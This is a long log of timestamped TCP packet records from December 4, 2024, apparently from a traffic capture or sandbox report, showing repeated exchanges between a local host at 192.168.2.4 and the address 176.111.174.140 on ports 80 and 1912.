                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.450980902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.451076031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.451123953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.452059984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.452157021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.452240944 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.453022957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.453125000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.453186989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.454062939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.454245090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.454291105 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.455111027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.455183029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.455279112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.456317902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.456399918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.456445932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.457298994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.457359076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.457520962 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.458492041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.458564997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.458612919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.459527016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.459642887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.459729910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.460609913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.460685015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.460850954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.461745024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.461920023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.461971998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.463040113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.463156939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.463197947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.464199066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.464325905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.464374065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.465270996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.465327978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.465373993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.466269016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.466362000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.466408014 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.467263937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.467370033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.467411995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.468496084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.468511105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.468573093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.469455004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.469568968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.469619989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.470572948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.470673084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.471685886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.471735954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.471801043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.471849918 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.472460985 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.472886086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.472960949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.473001003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.473905087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.474060059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.474137068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.475270033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.475466967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.475508928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.476145983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.476206064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.476249933 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.477308989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.477389097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.477436066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.478362083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.478476048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.478514910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.479446888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.479540110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.479743004 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.480552912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.480587006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.480782032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.481689930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.481790066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.481837034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.482758999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.482870102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.482949018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.483875990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.483979940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.484021902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.485042095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.485129118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.485197067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.486104012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.486164093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.486238003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.487148046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.487199068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.487287045 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.488347054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.488509893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.488567114 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.489370108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.489578009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.489628077 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.490674973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.490772009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.490839005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.491630077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.491731882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.491765976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.492881060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.492902994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.492945910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.494124889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.494213104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.494323969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.495295048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.495383024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.495420933 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.496189117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.496262074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.496296883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.497114897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.497340918 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.497383118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.498420954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.498506069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.498548031 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.499483109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.499586105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.499630928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.500374079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.553492069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.634830952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.634949923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.634999037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.635276079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.635457993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.635499001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.636177063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.636240959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.636414051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.637248993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.637370110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.637412071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.638365984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.638564110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.638626099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.639472961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.639595032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.639632940 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.640566111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.640664101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.640712023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.641732931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.641880989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.641941071 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.642847061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.642929077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.643109083 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.643879890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.643996000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.644035101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.645040989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.645212889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.645248890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.646128893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.646198034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.646328926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.647233009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.647363901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.647408009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.648323059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.648438931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.648484945 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.649501085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.649519920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.649602890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.650512934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.650644064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.650687933 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.651596069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.651678085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.651905060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.652748108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.652838945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.652899981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.653820992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.653920889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.653971910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.654942036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.655183077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.655251980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.656070948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.656265020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.656344891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.657162905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.657310009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.657352924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.658421040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.658548117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.658613920 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.659565926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.659676075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.659722090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.660648108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.660727978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.660804033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.661669016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.661772966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.661818027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.662672997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.662796974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.663007021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.663784027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.663909912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.663950920 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.665025949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.665153980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.665241957 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.665992022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.666126966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.666215897 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.667097092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.667222977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.667274952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.668263912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.668389082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.668447971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.669425964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.669672012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.669718981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.670541048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.670622110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.671761036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.671828032 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.671866894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.671928883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.672777891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.672951937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.673007011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.673825026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.673837900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.673877954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.674815893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.674982071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.675107956 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.675928116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.676026106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.676068068 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.677067995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.677181005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.677222967 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.678126097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.678225994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.678288937 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.678515911 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.792884111 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.798382044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.834815979 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:42.357929945 CET4974480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:42.478001118 CET8049744176.111.174.140192.168.2.4
